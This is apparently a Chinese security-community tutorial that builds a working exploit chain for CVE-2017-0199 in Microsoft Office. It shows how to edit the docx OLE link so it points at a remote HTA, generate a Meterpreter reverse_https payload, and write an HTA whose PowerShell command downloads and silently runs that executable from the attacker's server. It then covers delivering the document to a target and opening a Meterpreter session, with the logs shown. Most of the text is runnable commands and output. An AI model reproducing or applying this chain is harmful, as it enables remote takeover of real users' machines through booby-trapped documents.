先知技术社区独家发表本文,如需要转载,请先联系先知技术社区授权;未经授权请勿转载。先知技术社区投稿邮箱:Aliyun_xianzhi@service.alibaba.com;
一.背景
CVE-2017-0199 WORD/RTF嵌入OLE调用远程文件执行的一个漏洞。不需要用户交互。打开文档即中招。影响如下版本:
cpe:2.3:a:microsoft:office:2007:sp3:*:*:*:*:*:*
cpe:2.3:a:microsoft:office:2010:sp2:*:*:*:*:*:*
cpe:2.3:a:microsoft:office:2013:sp1:*:*:*:*:*:*
cpe:2.3:a:microsoft:office:2016:*:*:*:*:*:*:*
cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*
cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*
cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*
cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*
cpe:2.3:o:microsoft:windows_vista:*:sp2:*:*:*:*:*:*
二.实现环境
- linux一台(我用的ubuntu) #作为远程恶意代码存放服务器和MSF控制端
- Win10+office2010 #制作恶意文档环境
linux
1.先安装msf
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
chmod 755 msfinstall && \
./msfinstall
2.安装apache服务
apt-get install apache2
windows
先打开office用word创建一个包含OBJECT的文档。如下图。http://×××/xxx.rtf
这里文档地址必须存在不然创建不了。所以需要在上面的linux服务器www目录创建一个空文件xxx.rtf。另外记得勾选link to file 不然不会成功。制作了点击确定,文件另存为exploit.docx文件。
用7z打开exploit。找到exploit.docx\word_rels\document.xml.rels 解压出来。
找到oleObject对象。如下
Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="http://192.168.1.1/xx.rtf"
192.168.1.1 就是之前制作docx的插入服务器ip地址。修改为
Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="http://192.168.1.1/exploit.hta"
替换保存文件。然后覆盖7z打开exploit.docx文件
到此。调用远程恶意代码执行的docx的恶意文档制作就好了。下面来制作远程服务器需要调用的恶意代码。exploit.hta
1.先用msf生成一个恶意exe
msf > use payload/windows/meterpreter/reverse_https
msf payload(reverse_https) > set LHOST 192.168.2.18
LHOST => 192.168.2.18
msf payload(reverse_https) > generate -t exe -f /var/www/html/exploit.exe
[*] Writing 73802 bytes to /var/www/html/exploit.exe...
msf payload(reverse_https) > ls -l /var/www/html/exploit.exe
[*] exec: ls -l /var/www/html/exploit.exe
-rw-r--r-- 1 root root 73802 Apr 27 03:52 /var/www/html/exploit.exe
msf payload(reverse_https) > echo " " > /var/www/html/exploit.hta
[*] exec: echo " " >exploit.hta
msf payload(reverse_https) > ls - l /var/www/html/
[*] exec: ls - l /var/www/html/
/var/www/html/:
123.hta
exploit.exe
exploit.hta
msf payload(reverse_https) >
2.制作exploit.hta恶意文件
将下面内容放到exploit.hta文件里面
<html>
<head>
<script>var c= 'powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.*.*/exploit.exe','%TEMP%\exploit.exe'); Start-Process "%TEMP%\exploit.exe'); "new ActiveXObject('WScript.Shell').Run(c,0);</script>
</head>
<body>
<script>self.close();</script>
</body>
</html>
3.查看写入是否成功
msf payload(reverse_https) > cat /var/www/html/exploit.hta
[*] exec: cat /var/www/html/exploit.hta
<html>
<head>
<script>var c= 'powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.*.*/exploit.exe','%TEMP%\exploit.exe'); Start-Process "%TEMP%\exploit.exe'); "new ActiveXObject('WScript.Shell').Run(c,0);</script>
</head>
<body>
<script>self.close();</script>
</body>
</html>
msf payload(reverse_https) >
四.向目标植入恶意代码
上面已经制作exploit.exe exploit.hta exploit.docx三个文件
exploit.exe #需要放在linux服务器www目录
exploit.hta #需要放在linux服务器www目录
exploit.docx #恶意文档。需要在测试机器执行的
1.获取目标机器的IP
root@kali:~# echo "404" > /var/www/html/index.html
root@kali:~# ls -l /var/www/html/index.html
-rw-r--r-- 1 root root 4 Apr 27 04:03 /var/www/html/index.html
root@kali:~# chmod +x /var/www/html/index.html
制作一个空文档页面。获取http://0.0.0.0/index.html 发送给潜在测试目标
目标机器访问
root@kali:~# tail -f /var/log/apache2/access.log
192.168.*.1 - - [27/Apr/2017:04:05:36 -0400] "GET / HTTP/1.1" 200 285 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0"
192.168.*.1 - - [27/Apr/2017:04:05:36 -0400] "GET /favicon.ico HTTP/1.1" 404 503 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0"
192.168.*.1 - - [27/Apr/2017:04:05:36 -0400] "GET /favicon.ico HTTP/1.1" 404 503 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0"
得到日志。
用apache 自带模块设置IP白名单。只允许该IP访问LINUX服务器
将exploit.docx文档发送到测试机器打开执行
监控服务器日志
root@kali:~# tail -f /var/log/apache2/access.log
192.168.×.1 - - [27/Apr/2017:04:13:05 -0400] "HEAD /exploit.hta HTTP/1.1" 200 291 "-" "Microsoft Office Existence Discovery"
192.168.×.1 - - [27/Apr/2017:04:13:05 -0400] "GET /exploit.hta HTTP/1.1" 200 589 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/8.0; .NET4.0C; .NET4.0E; InfoPath.3; ms-office; MSOffice 14)"
192.168.×.1 - - [27/Apr/2017:04:13:05 -0400] "HEAD /exploit.hta HTTP/1.1" 200 290 "-" "Microsoft Office Existence Discovery"
192.168.×.1 - - [27/Apr/2017:04:13:05 -0400] "HEAD /exploit.hta HTTP/1.1" 200 290 "-" "Microsoft Office Existence Discovery"
192.168.×.1 - - [27/Apr/2017:04:13:05 -0400] "GET /exploit.exe HTTP/1.1" 304 180 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/8.0; .NET4.0C; .NET4.0E; InfoPath.3; ms-office; MSOffice 14)"
192.168.×.1 - - [27/Apr/2017:04:13:05 -0400] "HEAD /exploit.exe HTTP/1.1" 200 290 "-" "Microsoft Office Existence Discovery"
可以看到成功下载hta代码和exploit.exe 恶意二进制文件
msf监听
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf exploit(handler) > set LPORT 8443
LPORT => 8443
msf exploit(handler) > exploit
[*] Started HTTPS reverse handler on https://0.0.0.0:8443/
[*] Starting the payload handler...
[] 192.168..1:49552 (UUID: 598dfb1f29364bd1/x86_64=2/windows=1/2017-04-27T08:20:50Z) Staging Native payload ...
[] Meterpreter session 1 opened (192.168..18:8443 -> 192.168.*.1:49552) at 2017-04-27 04:20:51 -0400
meterpreter > getuid
Server username: EN-WIN10\Admin
meterpreter > sysinfo
Computer : EN-WINX64
OS : Windows 10 (Build 10240).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/win64
meterpreter >
完:
五.参考链接
https://www.secforce.com/blog/2017/04/cve-2017-0199-exploitation-with-cobalt-strike-tutorial/